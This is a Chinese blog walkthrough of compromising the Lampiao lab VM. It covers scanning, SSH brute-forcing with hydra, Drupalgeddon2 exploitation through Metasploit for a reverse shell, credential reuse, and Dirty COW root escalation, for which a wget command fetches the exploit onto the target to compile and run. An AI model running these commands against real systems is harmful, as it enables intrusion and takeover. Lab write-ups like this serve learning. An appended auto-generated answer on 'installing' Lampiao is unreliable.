Lampiao靶机渗透

确定主机 ip

信息收集

漏洞扫描

SSH暴力破解

1898端口(Drupal 7)网站漏洞扫描

漏洞利用

使用 msf 利用 drupalgeddon2漏洞 getshell

Linux shell 下收集信息获取tiago 用户 shell

提权

利用 SUID 权限程序提权失败

利用本地提权漏洞-脏牛漏洞提权

Lampiao 靶机渗透

Lampiao 靶机

确定主机 ip

netdiscover

或者:arp-scan -l

信息收集

端口扫描

命令:nmap192.168.150.145 -p- -O -sV

发现开放的端口:22,80,1898(Drupal7)

访问80端口:192.168.150.145:80

访问1898端口:192.168.150.145:1898

网站目录扫描

dirb http://192.168.150.145:1898/

发现了一些敏感文件 robots.txt、web.config、xmlrpc.php

通过网站生成字典

cewl http://192.168.150.145:1898 > userlam.txt

cewl http://192.168.150.145:1898 -w userlam.txt

可以查看内容:more userlam.txt

漏洞扫描

可以对发现的端口进行破解

SSH 暴力破解

使用从网站生成的字典作为用户名,以及下载好的top1000 字典作为密码进行破解

kali中的字典:wordlists

hydra -L userlam.txt -P userlam.txt ssh://192.168.150.145

扫了好久,还是没有找到。

1898 端口(Drupal 7)网站漏洞扫描

使用 searchsploit 搜索 Drupal 7: searchsploitDrupal 7

搜索 Drupal 7. Remote 定位 Drupal 7 的远程代码执行漏:searchsploitDrupal 7 remote code exe

搜索 :searchsploitDrupal 7 | grep (Metasploit)

可以看出,远程代码执行,并且有对应的模块,

可以发现漏洞最多关键字是:Drupalgeddon,百度搜索:Drupalgeddon

可以发现 Drupalgeddon2 漏洞应该是影响最多的,再次使用 searchsploit 搜索

可以发现有两个实际的漏洞利用程序(都是ruby 的),一个 POC

自己调用比较麻烦,使用框架比较容易一些。

漏洞利用

使用 msf 利用 drupalgeddon2 漏洞 getshell

msfconsole,进入 msf 控制台,输入:searchdrupalgeddon2

或者:searchdrupal

输入:useexploit/unix/webapp/drupal_drupalgeddon2

设置ip,端口,发起攻击

set RHOSTS 192.168.150.145

set PPORT 1898

run

反弹shell成功

输入:ls ,查看当前目录的文件,发现有一个mp3,还有一个audio.m4a

可以发现一个mp3,访问该文件,能播放,但是听不懂

还有一个录音文件 audio.m4a,访问该文件

输入:download audio.m4a, 下载该文件

里面的播放内容是:user tiago

在 msf中切换到/home 目录下,查看用户文件夹

可以确定有这样一个用户tiago,查看之前生成的字典,发现还真有这个名字

再次使用密码字典破解ssh

hydra -L userlam.txt -P userlam.txt ssh://192.168.150.145

发现什么没有找到

Linux shell 下收集信息获取 tiago 用户 shell

输入:shell , 进入 linux shell

输入:python -c 'import pty; pty.spawn("/bin/bash")', 切换为bash

百度搜索一些Drupal7 数据库配置文件

在 shell 中查看文件:

数据库名drupal

用户名:drupaluser

密码:Virgulino

试着访问数据库: mysql -u drupaluser -p Virgulino

显示没有权限

再次尝试 mysql 用户名密码登录:mysql -u drupaluser -p

居然成功了,看一下数据库

输入:show databases

use drupal

show tables

输入:select * from users;

密码是加密的,还是需要破解,现在已经筋疲力尽了,所以暂时不去破解了可以用数据库的密码切换一下 tiago 用户:Virgulino 发现可以切换

使用 id查看用户信息,sudo -l 查看权限信息,发现没有权限执行 sudo

后来再一次尝试使用网站生成的字典破解ssh 密码,发现也可以破解出密码是 Virgulino

hydra -l tiago -P userlam.txt ssh://192.168.150.145

提权

利用 SUID 权限程序提权失败

查找可以利用的SUID 权限程序

find / -user root -perm -4000 -print 2>/dev/null

暂时没有发现可以利用的点(常见可利用程序:nmap,vim,find,bash,more,less,nano,cp)

利用本地提权漏洞-脏牛漏洞提权

查看系统版本:uname-a, lsb_release -a

系统:Ubuntu14.04.5 ,内核 4.4.0-31,i686

使用: searchsploit linux 4.4.0 搜索内核编号

将源码拷贝到自己的目录中,下载到目标机器中编译执行,发现有的编译不了,有的执行不了。

使用 searchsploit 搜索脏牛漏洞: searchsploit linux dirty

将40847.cpp 拷贝到自己目录中,查看代码如何编译

输入:cp/usr/share/exploitdb/exploits/linux/local/40847.cpp .

输入:more 40847.cpp

启动web 服务器:python -m SimpleHTTPServer

python3 -m http.server 80

下载文件到目标机器中:wget http://192.168.150.137/40847.cpp

在目标机器中编译代码(切记不要在自己机器上编译)

查看命令

编译命令:g++-Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil

参数解释:

1.-Wall 一般使用该选项,允许发出 GCC 能够提供的所有有用的警告

2.-pedantic 允许发出 ANSI/ISO C 标准所列出的所有警告

3.-O2 编译器的优化选项的 4 个级别,-O0 表示没有优化,-O1 为缺省值,-O3 优化级别

最高

4.-std=c++11 就是用按 C++2011 标准来编译的

5.-pthread 在 Linux 中要用到多线程时,需要链接 pthread 库

6. -odcow gcc 生成的目标文件,名字为 dcow

执行./dcow-s 提权成功,切换到 root 目录,查看 flag.txt

小结

使用了以下工具

nmap,joomcan,msf,python自己 http 服务,gcc,g++ drupalgeddon2 漏洞,脏牛漏洞

本节涉及的失败:

ssh暴力破解失败

寻找suid 程序提权失败

编译linux 提权程序失败

领悟小结:

暴力破解不是万能的,信息收集才是万能的

  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
为了安装Lampiao靶机,您可以按照以下步骤进行操作: 1. 首先,您需要准备一个基于Linux的操作系统,比如Ubuntu或者Kali Linux。 2. 在您选择的操作系统上安装Apache服务器、MySQL数据库和PHP解释器,这就是所谓的LAMP堆栈。 - 对于Ubuntu,您可以使用以下命令安装LAMP堆栈: ``` sudo apt update sudo apt install apache2 mysql-server php libapache2-mod-php php-mysql ``` - 对于Kali Linux,您可以使用以下命令安装LAMP堆栈: ``` sudo apt update sudo apt install apache2 mariadb-server php libapache2-mod-php php-mysql ``` 3. 安装完成后,您需要下载Lampiao靶机的源代码。您可以在Lampiao的GitHub存储库上找到源代码:https://github.com/felipefacundes/lampiao 4. 解压下载的源代码包,并将其复制到Apache服务器的网页根目录下,默认情况下是`/var/www/html/`。 5. 接下来,您需要创建一个MySQL数据库并导入Lampiao的数据。进入MySQL命令行界面并执行以下命令: - 创建数据库: ``` CREATE DATABASE lampiao; ``` - 导入数据: ``` USE lampiao; SOURCE /path/to/lampiao.sql; ``` 将`/path/to/lampiao.sql`替换为实际的lampiao.sql文件路径。 6. 配置Lampiao的数据库连接。编辑Lampiao源代码中的`config.php`文件,并根据您的MySQL配置进行相应的更改。 7. 最后,启动Apache服务器并访问Lampiao靶机。在浏览器中输入服务器的IP地址或域名,您应该能够看到Lampiao的登录页面。 请注意,Lampiao是一个漏洞靶场,仅供学习和研究目的使用。在安装和使用Lampiao时,请确保您遵守当地法律和道德准则。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值